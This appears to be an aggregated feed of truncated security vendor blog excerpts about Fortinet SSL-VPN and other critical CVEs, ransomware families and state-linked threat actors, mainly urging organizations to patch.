Impacted Users: Government & large organizations
Impact: Data loss and OS and file corruption
Severity Level: High
Fortinet published a CVSS Medium PSIRT Advisory (FG-IR-22-369 / CVE-2022-41328) on March 7th, 2023. The following write-up details our initial investigation into the incident that led to the discovery of this vulnerability and additional IoCs identified during our ongoing analysis.
Executive Summary
Multiple IoCs have been uncovered related to the incident FG-IR-22-369 / CVE-2022-41328.
The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets.
Incident Analysis
Fortinet’s investigat
Fortinet
Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd | Fortinet Blog
blogs_fortinet·2023-01-11·CVSS 9.8
CVE-2022-42475 [CRITICAL] Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd | Fortinet Blog
PSIRT BLOGS
Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd
By Carl Windsor, Guillaume Lovet, Hongkei Chan, and Alex Kong | January 11, 2023
Affected Platforms: FortiOS
Impacted Users: Government & large organizations
Impact: Data loss and OS and file corruption
Severity Level: High
Fortinet has published CVSS: Critical advisory FG-IR-22-398 / CVE-2022-42475 on Dec 12, 2022. The following writeup details our initial investigation into this malware and additional IoCs identified during our ongoing analysis.
Executive Summary
Multiple additional IoCs have been uncovered related to the incident FG-IR-22-398 / CVE-2022-42475
The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets.
Incid
Sentinelone
Avaddon
blogs_sentinelone·2022-11-30
Avaddon
Sentinelone
REvil
blogs_sentinelone·2022-11-30
REvil
Trendmicro
Security Gaps in Home Office Setups
blogs_trendmicro·2022-10-19
Security Gaps in Home Office Setups
Malware
## Security Gaps in Home Office Setups
Remote and hybrid work are now the norm. We have analyzed the associated risks and threats and give companies detailed recommendations on how to secure these distributed workforces.
By: Trend Micro, Oct 19, 2022
Companies are now either returning to the office, switching permanently to remote work, or opting for a combination of the two. Each of these options has its advantages and disadvantages, but from a cybersecurity perspective the latter two bring their own challenges and draw attention to security gaps.
In the case of hybrid and work-from-home (WFH) arrangements, employees no longer enjoy the
Fortinet
Update Regarding CVE-2022-40684 | Fortinet Blog
blogs_fortinet·2022-10-14·CVSS 9.8
CVE-2022-40684 [CRITICAL] Update Regarding CVE-2022-40684 | Fortinet Blog
PSIRT BLOGS
Update Regarding CVE-2022-40684
By Carl Windsor | October 14, 2022
Fortinet recently distributed a PSIRT Advisory regarding CVE-2022-40684 that details urgent mitigation guidance, including upgrades as well as workarounds for customers and recommended next steps. The following update and considerations are part of our efforts to communicate the availability of patches and mitigations to address CVE-2022-40684 and also strongly urge potentially affected customers to immediately update their FortiOS, FortiProxy, and FortiSwitchManager products.
Timely and ongoing communications with our customers is a key component in our efforts to best protect their organization. Customer communications often detail the most up-to-date guidance and recommended next steps.
In this case, we w
Tenable
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
blogs_tenable·2022-09-15
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
## Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, is operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares, 2022/09/06
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entities, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PL
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities
blogs_qualys·2022-05-06·CVSS 10.0
[CRITICAL] CISA Alert: Top 15 Routinely Exploited Vulnerabilities
## Table of Contents
CISA's Top 15 Routinely Exploited Vulnerabilities of 2021
Highlights of Top Vulnerabilities Cited in CISA 2021 Report
Log4Shell Vulnerability
ProxyShell: Multiple Vulnerabilities
ProxyLogon: Multiple Vulnerabilities
How Can Qualys Help?
Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights in
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today.
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Java
Tenable
ContiLeaks: Chats Reveal Over 30 Vulnerabilities Used by Conti Ransomware – How Tenable Can Help
blogs_tenable·2022-03-24
ContiLeaks: Chats Reveal Over 30 Vulnerabilities Used by Conti Ransomware – How Tenable Can Help
Qualys
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
blogs_qualys·2022-02-26
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
## Table of Contents
Protecting Customer Data on Qualys Cloud Platform
Urgent: Assess and Heighten Your Security Posture
Step 1: Monitor Your Shodan/Internet Exposed Assets
Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities
Step 3: Protect Your Cloud Services and Office 365
Step 4: Continuously Detect any Potential Threats and Attacks
Take Action to Learn More about How to Strengthen Your Defenses
CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA’s recommendations.
With the invasion of Ukraine by Russia, the U.
Tenable
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
blogs_tenable·2022-02-24
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
Unit42
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
blogs_unit42·2022-02-22
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
## Executive Summary
Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially. Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced. These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions. On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine. Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.
Consistent with our previous reporting on the topic, several western governments have issued recommendations for their populations to prepare for cyberattacks that could disrupt, disable or destroy critical infrastructure. We have already observed an increase in Russian c
Checkpoint
21st February – Threat Intelligence Report
blogs_checkpoint·2022-02-21·CVSS 9.8
CVE-2018-13379 [CRITICAL] 21st February – Threat Intelligence Report
## 21st February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 21st February, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Check Point Research has investigated the attack against Iranian broadcasting that occurred in late January. CPR was able to discover part of the tools that were utilized in this operation, including the evidence of the usage of a destructive wiper malware.
Check Point Research has discovered a new implementation of the
Sentinelone
Log4j2 In The Wild | Iranian-Aligned Threat Actor "TunnelVision" Actively Exploiting VMware Horizon
blogs_sentinelone·2022-02-17·CVSS 9.1
[CRITICAL] Log4j2 In The Wild | Iranian-Aligned Threat Actor "TunnelVision" Actively Exploiting VMware Horizon
By Amitai Ben Shushan Ehrlich and Yair Rigevsky
## Executive Summary
- SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.
- Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.
- Much like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to deployment of ransomware, making the group a potentially destructive actor.
## Overview
TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), M
Trendmicro
LockBit in the Spotlight
blogs_trendmicro·2022-01-09
LockBit in the Spotlight
## LockBit in the Spotlight
LockBit is one of the most active ransomware families, with powerful malware capabilities and a strong affiliate program. Companies are therefore advised to know LockBit's tactics, techniques, and procedures (TTPs).
By: Trend Micro Research, Jan 09, 2022
Original article by Trend Micro Research
LockBit first appeared in September 2019 as ABCD ransomware and has since evolved into one of the most widespread ransomware families today. Through their professional business operations and strong affiliate program, LockBit's operators have shown that they are in it for the long haul. Knowing their tactics helps companies strengthen their defenses against current and future
Fortinet
Apache Log4j Vulnerability | Fortinet Blog
blogs_fortinet·2021-12-12
Apache Log4j Vulnerability | Fortinet Blog
PSIRT BLOGS
Apache Log4j Vulnerability
By Carl Windsor | December 12, 2021
Apache Log4j Vulnerability Defined
Apache Log4j is a Java-based logging audit framework and Apache Log4j2 1.14.1 and below are susceptible to a remote code execution vulnerability where an attacker can leverage this vulnerability to take full control of a machine.
This module is a prerequisite for other software which means it can be found in many products and is trivial to exploit. It is critical that organizations take immediate action to inventory their systems and prioritize remediation.
Impacted Versions
Apache Log4j 2.x <= 2.15.0-rc1
CVSS: 10 (CRITICAL)
Apache Log4j Vulnerability Overview
Until a few days ago, most people would not have had any knowledge of the Log4j2 software. However, this little-know
Trendmicro
Conti Ransomware in the Spotlight
blogs_trendmicro·2021-12-07
Conti Ransomware in the Spotlight
## Conti Ransomware in the Spotlight
Because Conti is among the most active and notorious ransomware families at present, organizations should know how its attacks proceed and which tools are used. We have compiled the details as well as detailed countermeasures.
By: Trend Micro, Dec 07, 2021
Original post by Trend Micro Research
Conti is considered the successor of the Ryuk ransomware and is one of the most notorious ransomware families currently active, operating among other things as ransomware-as-a-service (RaaS) with
Securelist
Cyberthreats to financial organizations in 2022
blogs_securelist·2021-11-23
Cyberthreats to financial organizations in 2022
Table of Contents
Analysis of forecasts for 2021
Key events in 2021
Forecasts for 2022
Authors
Dmitry Bestuzhev
Santiago Pontiroli
Fabio Assolini
Seongsu Park
## A look back on the year 2021 and what to expect in 2022
First of all, we are going to analyze the forecasts we made at the end of 2020 and see how accurate they were. Then we will go through the key events of 2021 relating to attacks on financial organizations. Finally, we will make some forecasts about financial attacks in 2022.
## Analysis of forecasts for 2021
The COVID-19 pandemic is likely to cause a massive wave of poverty, and that invariably translates into more people resorting to crime, including cybercrime. We might see certain economies crashing and local currencies plummeting, which would make Bitcoin thef
Checkpoint
22nd November – Threat Intelligence Report
blogs_checkpoint·2021-11-22·CVSS 9.8
CVE-2018-13379 [CRITICAL] 22nd November – Threat Intelligence Report
## 22nd November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 22nd November, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Emotet, the most popular and notorious botnet before its takedown ten months ago, is back. Emotet is currently distributed via TrickBot and has already launched a worldwide email spam campaign delivering malicious documents. Researchers believe that the Conti ransomware gang is behind the botnet's return.
Check Point Threat E
Tenable
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
blogs_tenable·2021-11-03
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
Fortinet
Fortinet and Expiring Let’s Encrypt Certificates
blogs_fortinet·2021-09-30
Fortinet and Expiring Let’s Encrypt Certificates
PSIRT BLOGS
Fortinet and Expiring Let’s Encrypt Certificates
By Carl Windsor | September 30, 2021
Fortinet was made aware by customers in the early hours of September 30th that TLS connections to web sites using Let's Encrypt certificates were failing. Our first response was to validate the certificate chain. We discovered that the root CA for Let's Encrypt certificates, IdenTrust DST Root CA X3, had expired at 00:00 UTC on September 30th.
This was not unexpected: deprecation of this certificate had been planned for some time by Let's Encrypt, as they are in the process of moving to the self-signed ISRG Root X1 root CA. In preparation for this, Fortinet had pushed out the new root CA certificate ISRG Root X1 to FortiGate devices. Any Let's Encrypt certificates issued since May 2021 using t
Trendmicro
Examining the Cring Ransomware Techniques
blogs_trendmicro·2021-09-24·CVSS 9.8
[CRITICAL] Examining the Cring Ransomware Techniques
## Examining the Cring Ransomware Techniques
In this entry, we look at the techniques typically employed by the Cring ransomware, as well as the most affected regions and industries.
By: Warren Sto.Tomas, 2021/09/24
The Cring ransomware made headlines as the threat was used in an attack that exploited a bug in the 11-year-old version of the Adobe ColdFusion 9 software.
This has been the first recorded incident involving Cring operators' use of the said vulnerability. Past Cring attacks either abused insecure remote desktop protocol (RDP) or virtual private network (VPN) vulnerabilities to gain initial access.
Ransom.Win32.CRING.C is our detection name for the executable, while Ransom.MSIL.CRYNG.A is the detection name that is used to detect C#-based s
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay, Sep 21, 2021
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unp
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·2021-09-21·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom, a more than 300% increase over the previous year. By this year's end, it's predicted that cybercrime will cost the world $6 trillion. While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us, and unfortunately it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only
Checkpoint
13th September – Threat Intelligence Report
blogs_checkpoint·2021-09-13·CVSS 9.8
CVE-2018-13379 [CRITICAL] 13th September – Threat Intelligence Report
## 13th September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th September, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Mēris, a new distributed denial-of-service (DDoS) botnet, has broken a record with a 21.8 million requests-per-second attack on Russian internet company Yandex; 250,000 devices are assumed to be compromised.
MyRepublic, a Singaporean communications services company, has disclosed a data breach exposing government ID c
Fortinet
Malicious Actor Discloses FortiGate SSL-VPN Credentials
blogs_fortinet·2021-09-08·CVSS 9.1
CVE-2018-13379 [CRITICAL] Malicious Actor Discloses FortiGate SSL-VPN Credentials
PSIRT BLOGS
Malicious Actor Discloses FortiGate SSL-VPN Credentials
By Carl Windsor | September 08, 2021
Fortinet has become aware that a malicious actor has recently disclosed SSL-VPN access information to 87,000 FortiGate SSL-VPN devices. These credentials were obtained from systems that remained unpatched against FG-IR-18-384 / CVE-2018-13379 at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable.
This incident is related to an old vulnerability resolved in May 2019. At that time, Fortinet issued a PSIRT advisory and communicated directly with customers. And because customer security is our top priority, Fortinet subsequently issued multiple corporate blog posts detailing this issue, strongly encouraging custom
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
Fortinet
PSIRT and Responsible Disclosure
blogs_fortinet·2021-08-19
PSIRT and Responsible Disclosure
PSIRT BLOGS
PSIRT and Responsible Disclosure
By Carl Windsor | August 19, 2021
The Fortinet Product Security Incident Response Team (PSIRT) helps to coordinate security for over 40 products - hardware, software, virtual machine and cloud, and for more firewalls shipped per quarter than all four of our nearest competitors. We work hard daily to improve our processes, train employees, directly improve product security, and work closely with third-party threat researchers as well as ensure a timely response for all reported issues.
With regards to the FortiWeb vulnerability identified by Rapid7, Fortinet has published an Out of Cycle Advisory, FG-IR-21-116, to advise of the resolution and provide a workaround.
Workaround: Disable access to the management interface from untrusted networks,
Tenable
How Risk-based Vulnerability Management Can Help Address the Most Commonly Exploited Vulnerabilities Today
blogs_tenable·2021-07-30
How Risk-based Vulnerability Management Can Help Address the Most Commonly Exploited Vulnerabilities Today
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2021-07-29·CVSS 10.0
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- Top Routinely Exploited Vulnerabilities
- Detect CISA's Top Routinely Exploited Vulnerabilities using Qualys VMDR
- Recommendations
- Remediation and Mitigation
- Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the large
Fortinet
Fortinet Provides Immediate Patch Update and Mitigations for Critical FortiManager and FortiAnalyzer Vulnerability - CVE-2021-32589
blogs_fortinet·2021-07-20·CVSS 8.1
CVE-2021-32589 [HIGH] Fortinet Provides Immediate Patch Update and Mitigations for Critical FortiManager and FortiAnalyzer Vulnerability - CVE-2021-32589
PSIRT BLOGS
Fortinet Provides Immediate Patch Update and Mitigations for Critical FortiManager and FortiAnalyzer Vulnerability - CVE-2021-32589
By Carl Windsor | July 20, 2021
On July 19, Fortinet published a security advisory documenting and sharing patches and workarounds for a Use-After-Free (UAF) vulnerability (CWE-416) in FortiManager, and in some edge cases, FortiAnalyzer. If not updated using the patch and mitigations provided by Fortinet, this vulnerability may allow a remote, non-authenticated attacker to execute unauthorized code as root via sending a specifically crafted request to the targeted device.
We urgently reiterate our strong recommendation for any customers who have not yet updated their devices that they take immediate action to mitigate this risk. This includes up
Talos
Threat Source newsletter (June 17, 2021)
blogs_talos·2021-06-17
Threat Source newsletter (June 17, 2021)
Good afternoon, Talos readers.
Although the Colonial Pipeline attack is largely behind us now, its potential repercussions are not. This was just the latest in a string of attacks against American critical infrastructure over the past few years, and we don't expect them to slow down any time soon.
Talos researchers have outlined a series of steps critical infrastructure organizations can take to secure their networks, and what the government needs to do to protect physical property and prevent potential life-threatening attacks. If you are experiencing an emergency or in need of an incident response retainer, Cisco Talos Incident Response is available for proactive and emergency response.
## Cybersecurity week in review
- NATO's Secretary General suggested that any cyber attacks on memb
Fortinet
Prioritizing Patching is Essential for Network Integrity
blogs_fortinet·2021-06-01·CVSS 9.1
[CRITICAL] Prioritizing Patching is Essential for Network Integrity
PSIRT BLOGS
Prioritizing Patching is Essential for Network Integrity
By Carl Windsor | June 01, 2021
Regarding the FBI - CISA/NCSC alerts of FortiGate SSL-VPN vulnerabilities being exploited in the wild
A recent FBI advisory outlined that foreign hackers had gained access to a local US municipal government network after exploiting vulnerabilities in an unpatched Fortinet networking appliance.
This advisory, however, was not the result of cybercriminals targeting a newly identified security issue. The sad fact is, fixes for these vulnerabilities had been shared with affected customers over two years ago. This and similar incidents highlight that the failure to patch vulnerable systems still represents one of the most critical security gaps in many organizations and is responsible for th
Checkpoint
19th April – Threat Intelligence Report
blogs_checkpoint·2021-04-19·CVSS 9.8
CVE-2018-13379 [CRITICAL] 19th April – Threat Intelligence Report
## 19th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th April, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
The U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have published a joint advisory warning that a Russia-linked APT group, APT25, is exploiting five vulnerabilities in an ongoing attack against U.S. targets.
Check Point IPS provide
Talos
Threat Advisory: NSA SVR Advisory Coverage
blogs_talos·2021-04-15·CVSS 9.1
[CRITICAL] Threat Advisory: NSA SVR Advisory Coverage
## Threat Advisory: NSA SVR Advisory Coverage
The U.S. National Security Agency released an advisory outlining several vulnerabilities that the Russian Foreign Intelligence Services (SVR) is exploiting in the wild. The U.S. formally attributed the recent SolarWinds supply chain attack to the SVR group in this advisory and detailed more of the group's tactics, techniques and procedures.
The exploits included a series of five CVEs that affect VPN solutions, collaboration suite software and virtualization technologies. All five of the CVEs have been patched; Cisco Talos encourages everyone with the affected software to update immediately. Some of these vulnerabilities also have working Metasploit modules and are currently being widely exploited. Please note that some of these vulnerabilities
Tenable
CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
blogs_tenable·2021-04-08·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
Checkpoint
5th April – Threat Intelligence Report
blogs_checkpoint·2021-04-05
CVE-2021-21975 5th April – Threat Intelligence Report
## 5th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 5th April, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Personal information of some 553 million Facebook users from 100 countries has been stolen and published online for free in a hacking forum. The records include full name, Facebook ID, phone number, email, location, bio and more.
Iranian APT group Charming Kitten, linked to the government, has launched a new phishing campaign
Fortinet
Patch and Vulnerability Management | Fortinet
blogs_fortinet·2021-04-03·CVSS 6.5
[MEDIUM] Patch and Vulnerability Management | Fortinet
PSIRT BLOGS
Patch and Vulnerability Management
By Carl Windsor | April 03, 2021
In May 2019, Fortinet issued a PSIRT advisory regarding an SSL vulnerability that had been identified by a third-party research team and which we resolved. As part of this process, we issued a Customer Support Bulletin (CSB-200716-1) to highlight the need for customers to upgrade their affected systems. We also published a blog about this for our customers in August 2019, when this vulnerability was made public post-resolution at Black Hat in August 2019. Over a year later, the UK NCSC shared that these same vulnerabilities were still being targeted in the wild, and we published another blog in July 2020 and then another in November 2020 with the goal of continuing to educate and communicate with our customer
Tenable
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
blogs_tenable·2021-03-10
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
Trendmicro
Examining a Sodinokibi Attack
blogs_trendmicro·2021-01-26·CVSS 9.1
[CRITICAL] Examining a Sodinokibi Attack
# Examining A Sodinokibi Attack
Sodinokibi was behind several notable attacks last year. In this entry, we describe its attack process using some of the examples we encountered.
By: Trend Micro Research
2021/01/26
Sodinokibi was first detected in April 2019 and linked to the retired GandCrab. From that point on, Sodinokibi launched several high-profile attacks that continued throughout 2020, thus making a name for itself as one of the ransomware families that should be watched out for. Here we describe Sodinokibi’s typical attack process.
Technical analysis
The threat actors behind Sodinokibi typically hire a variety of affiliates for their initial access. Their attacks often begin with familiar techniques like malspam emails with spear-phishing lin
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
## Threat Brief: FireEye Red Team Tool Breach
Unit 42
Published: December 10, 2020
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls and mitigations for defense against the stolen tools. This data is being used by Palo Alto Networks to help ensure our customers are protected if the attackers choose to utilize the tools for malicious purposes.
Fortinet
FireEye Red Team Tool Breach | Fortinet
blogs_fortinet·2020-12-11·CVSS 8.8
[HIGH] FireEye Red Team Tool Breach | Fortinet
PSIRT BLOGS
FireEye Red Team Tool Breach
By Carl Windsor | December 11, 2020
Executive Summary
On December 8th cyber security vendor FireEye reported a breach of their network and data exfiltration which included their internally developed Red Team tools. FireEye took the step of publishing details of these tools in a GitHub repository to allow other vendors to protect against their use by potential adversaries.
This breach has been attributed to a nation-state threat actor, so we do not expect to see these tools widely abused in the wild; however, with the additional information provided by FireEye, Fortinet have been able to ensure that these tools cannot be abused.
Threat Mitigation
None of the vulnerabilities disclosed as targeted in the tools were zero days, therefore FortiGuard
Qualys
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
blogs_qualys·2020-12-10
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
Update Jan 5, 2021: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.
Update Dec 23, 2020: Added a new section on compensating controls.
Update Dec 22, 2020: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.
Using Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):
- Active Attacks
- Solorigate Sunburst (New RTI)
Original post: On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the securit
Zscaler
SolarWinds CyberAttack and FireEye Red Team Tools Coverage
blogs_zscaler·2020-12-09
SolarWinds CyberAttack and FireEye Red Team Tools Coverage
Fortinet
Update Regarding CVE-2018-13379 | Fortinet
blogs_fortinet·2020-11-30·CVSS 9.1
CVE-2018-13379 [CRITICAL] Update Regarding CVE-2018-13379 | Fortinet
PSIRT BLOGS
Update Regarding CVE-2018-13379
By Carl Windsor | November 30, 2020
The security of our customers is our first priority. As part of our standard PSIRT process, upon an indication of an alleged vulnerability shared through responsible disclosure, Fortinet works hard to remediate those potential vulnerabilities and then communicates mitigation guidance. And, as a PSIRT team and forward-looking security vendor, we are constantly seeking ways to engage, educate, and encourage our customers to institute mitigation best practices and to patch their systems.
For example, in May 2019 Fortinet issued a PSIRT advisory regarding an SSL vulnerability that was resolved, and have also communicated directly with customers and again via corporate blog posts in August 2019 and July 2020 stro
Tenable
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
blogs_tenable·2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
Tenable
CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
blogs_tenable·2020-10-15·CVSS 9.8
[CRITICAL] CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
Tenable
CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
blogs_tenable·2020-10-12·CVSS 5.5
[MEDIUM] CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
Fortinet
APT 29 Targeting SSL VPN Flaws
blogs_fortinet·2020-07-16·CVSS 9.1
[CRITICAL] APT 29 Targeting SSL VPN Flaws
PSIRT BLOGS
APT 29 Targeting SSL VPN Flaws
By Carl Windsor | July 16, 2020
The United Kingdom’s National Cyber Security Centre (NCSC) and Canada’s Communications Security Establishment (CSE) have published research into the activity of ‘APT29’, also known as ‘the Dukes’ or ‘Cozy Bear’, who have been targeting various organisations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines.
The initial attack vectors for this group have been unpatched vulnerabilities in SSL-VPN solutions, including Fortinet’s. One of the vectors used was a vulnerability resolved by Fortinet in May 2019, which allowed an unauthenticated at
Tenable
CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
blogs_tenable·2020-06-29·CVSS 10.0
[CRITICAL] CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
Tenable
How COVID-19 Response Is Expanding the Cyberattack Surface
blogs_tenable·2020-03-30
How COVID-19 Response Is Expanding the Cyberattack Surface
Fortinet
FortiOS and SSL Vulnerabilities
blogs_fortinet·2019-08-28·CVSS 9.1
[CRITICAL] FortiOS and SSL Vulnerabilities
PSIRT BLOGS
FortiOS and SSL Vulnerabilities
By Fortinet | August 28, 2019
At the recent Black Hat 2019 conference held in Las Vegas this past August 3-8, security researchers discussed their discovery of security vulnerabilities that impacted several security vendors, including Fortinet. All of the vulnerabilities impacting Fortinet were fixed in April and May of 2019.
SSL VPN Vulnerabilities
Two of the vulnerabilities directly affected Fortinet’s implementation of SSL VPN. They are:
